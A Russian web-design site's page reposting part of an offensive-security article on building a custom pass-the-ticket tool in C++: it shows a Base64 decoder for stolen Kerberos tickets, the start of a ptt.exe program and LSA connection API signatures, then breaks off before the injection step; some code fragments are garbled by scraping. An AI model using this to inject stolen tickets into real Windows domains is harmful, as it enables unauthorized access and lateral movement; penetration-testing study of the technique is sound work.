Учебник CSS
Невозможно отучить людей изучать самые ненужные предметы.
Введение в CSS
Преимущества стилей
Добавления стилей
Типы носителей
Базовый синтаксис
Значения стилевых свойств
Селекторы тегов
Классы
CSS3
Надо знать обо всем понемножку, но все о немногом.
Идентификаторы
Контекстные селекторы
Соседние селекторы
Дочерние селекторы
Селекторы атрибутов
Универсальный селектор
Псевдоклассы
Псевдоэлементы
Кто умеет, тот делает. Кто не умеет, тот учит. Кто не умеет учить - становится деканом. (Т. Мартин)
Группирование
Наследование
Каскадирование
Валидация
Идентификаторы и классы
Написание эффективного кода
Самоучитель CSS
Вёрстка
Изображения
Текст
Цвет
Линии и рамки
Углы
Списки
Ссылки
Дизайны сайтов
Формы
Таблицы
CSS3
HTML5
Новости
Блог для вебмастеров
Новости мира Интернет
Сайтостроение
Ремонт и советы
Все новости
Справочник CSS
Справочник от А до Я
HTML, CSS, JavaScript
Афоризмы
Афоризмы о учёбе
Статьи об афоризмах
Все Афоризмы
- 19 апрель 2023, 08:23
- 20 апрель 2024, 00:00
| Помогли мы вам |
- 19 апрель 2023, 08:23
- 15 март 2020, 12:20
предыдущей моей статье я рассказал об Authentication Package, Security Package и мы успешно перехватили пароль пользователя. Но этого мало, не так ли? Следующим шагом будет внедрение билетов Kerberos для реализации атаки pass the ticket. Само собой, никакого Mimikatz и Impacket мы использовать не будем. Абсолютно все будет сделано своими силами (ну и с использованием стандартного Win32 API).
Получение тикета
Тикет передается атакующему, например при дампе, в формате Base64 — в «сыром» виде тикет может иметь непечатаемые символы, что приведет к выводу на экран непонятно чего. В связи с этим, чтобы наш код мог инжектить рабочие тикеты, следует предусмотреть в нем возможность декодировать полученную строку. Предлагаю создать файл stuff., в котором реализуем простенькую функцию для декодирования значения Base64. Дополнительно поместим туда все заголовочные файлы, которые потребуются нам в будущем.
#pragma once#define WIN32_NO_STATUS#define SECURITY_WIN32#include <windows.h>#include <sspi.h>#include <NTSecAPI.h>#include <ntsecpkg.h>#include <iostream>#include <string>#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)#pragma comment (lib, "Secur32.lib")static char encoding_table[] = { 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H','I', 'J', 'K', 'L', 'M', 'N', 'O', 'P','Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X','Y', 'Z', 'a', 'b', 'c', 'd', 'e', 'f','g', 'h', 'i', 'j', 'k', 'l', 'm', 'n','o', 'p', 'q', 'r', 's', 't', 'u', 'v','w', 'x', 'y', 'z', '0', '1', '2', '3','4', '5', '6', '7', '8', '9', '+', '/' };static char* decoding_table = NULL;static int mod_table[] = { 0, 2, 1 };void build_decoding_table();unsigned char* base64_decode(const char* data, size_t input_length, size_t* output_length);void build_decoding_table() { decoding_table = (char*)malloc(256); if (decoding_table == NULL) {exit(-1); } for (int i = 0; i < 64; i++) {decoding_table[(unsigned char)encoding_table[i]] = i; }}unsigned char* base64_decode(const char* data, size_t input_length, size_t* output_length) { if (decoding_table == NULL) build_decoding_table(); if (input_length % 4 != 0) return NULL; *output_length = input_length / 4 * 3; if (data[input_length - 1] == '=') {(*output_length)--; } if (data[input_length - 2] == '=') (*output_length)--; unsigned char* decoded_data = (unsigned char*)malloc(*output_length); if (decoded_data == NULL) return NULL; for (int i = 0, j = 0; i < input_length;) {DWORD sextet_a = data[i] == '=' ? 0 & i++ : decoding_table[data[i++]];DWORD sextet_b = data[i] == '=' ? 0 & i++ : decoding_table[data[i++]];DWORD sextet_c = data[i] == '=' ? 0 & i++ : decoding_table[data[i++]];DWORD sextet_d = data[i] == '=' ? 0 & i++ : decoding_table[data[i++]];DWORD triple = (sextet_a << 3 * 6)+ (sextet_b << 2 * 6)+ (sextet_c << 1 * 6)+ (sextet_d << 0 * 6);if (j < *output_length) decoded_data[j++] = (triple >> 2 * 8) & 0xFF;if (j < *output_length) decoded_data[j++] = (triple >> 1 * 8) & 0xFF;if (j < *output_length) decoded_data[j++] = (triple >> 0 * 8) & 0xFF; } return decoded_data;}Тикет нашей программе мы будем передавать через аргументы командной строки. Создадим файл Source. с таким содержимым:
#include "stuff.h"void usage() { std::cout << "ptt.exe <b64 ticket>" << std::endl;}int main(int argc, char** argv) { if (argc != 2) {usage();return 1; } unsigned int kirbiSize = 0; char* ticket = argv[1]; unsigned char* kirbiTicket = base64_decode(ticket, strlen(ticket), &kirbiSize); if (kirbiSize == 0) {std::wcout << L"[-] Error converting from b64" << std::endl;return 1; } ...В этом файле мы получаем второй аргумент, содержащий закодированный в Base64 тикет. Первый — это имя программы: например, в случае вызова prog. в argv[ будет prog., а в argv[ — 123. После чего вызываем функцию для декодирования, проверяем, что размер изменился. Ведь если изменился размер, значит, что‑то (может, даже и успешно) декодировалось.
Подключение к LSA
Именно процесс службы LSA будет хранить в своем адресном пространстве все тикеты. Внутри процесса lsass. подгружена kerberos., которая и реализует все функции одноименного протокола. Так или иначе, следует отличать TGT от TGS, да и в принципе понимать работу «Кербероса». Вот видеоролики, которые позволят новичкам разобраться в теме:
Керберос. Использование аутентификационных протоколов Windows в тестировании на проникновение;
Школа информационной безопасности Яндекса. Windows & AD.
Подключиться к LSA несложно, для этого есть две специальные функции.
NTSTATUS LsaRegisterLogonProcess( [in] PLSA_STRINGLogonProcessName, [out] PHANDLELsaHandle, [out] PLSA_OPERATIONAL_MODE SecurityMode);NTSTATUS LsaConnectUntrusted( [out] PHANDLE LsaHandle);Первая позволяет получить хендл на LSA от лица процесса входа в систему. Эту функцию, например, вызывает winlogon. во время входа пользователя в систему. С помощью полученного таким образом хендла появится возможность использовать LSA для аутентификации, управления пользовательским входом и доступом.
- © Поставщик небезопасности. Как Windows раскрывает пароль пользователя - «Новости»
- © RDP over SSH. Как я писал клиент для удаленки под винду - «Новости»
- © HTB Unicode. Подделываем токен JWT и захватываем сервер через curl - «Новости»
- © HTB Toby. Взламываем сервер через череду чужих бэкдоров - «Новости»
- © HTB Scrambled. Применяем ASREPRoast и Kerberoasting для атаки на SMB и MS SQL - «Новости»
- © HTB ScriptKiddie. Атакуем Metasploit при помощи Metasploit, чтобы захватить хост - «Новости»
- © HTB Sink. Учимся прятать запросы HTTP и разбираемся с AWS Secrets Manager - «Новости»
- © HTB Extension. Пентестим плагин для Gitea и сбегаем из Docker - «Новости»
- © Уроки форензики. Исследуем вредоносные документы Microsoft Office - «Новости»
- © HTB Timing. Пентестим веб-сервер на PHP - «Новости»
|
|
|
|
АВТОРИЗАЦИЯ
|
• Мы информационный портал, на котором публикуются новости веб-дизайна и мелкие хитрости, а так же информация и советы которые вам смогут помочь по созданию сайтов, шаблонов, и многое другое. Вы также сможете найти интересные уроки по CSS3, HTML5, jQuery, Photoshop и и многое другое, интересное, с интернет мира. Вся информация размещенная на сайте предназначена исключительно в ознакомительных целях и ошибки в учении не кто не отменял .. Как говориться - "Не бойся, когда не знаешь: страшно, когда знать не хочется." «Самоучитель CSS » © Мы транслируем с 2006 года. Все для веб-дизайнера - CSS. Все материалы публикуют на сайте гости и пользователи сайта. Администрация сайта не несет ответственности за публикации. |
|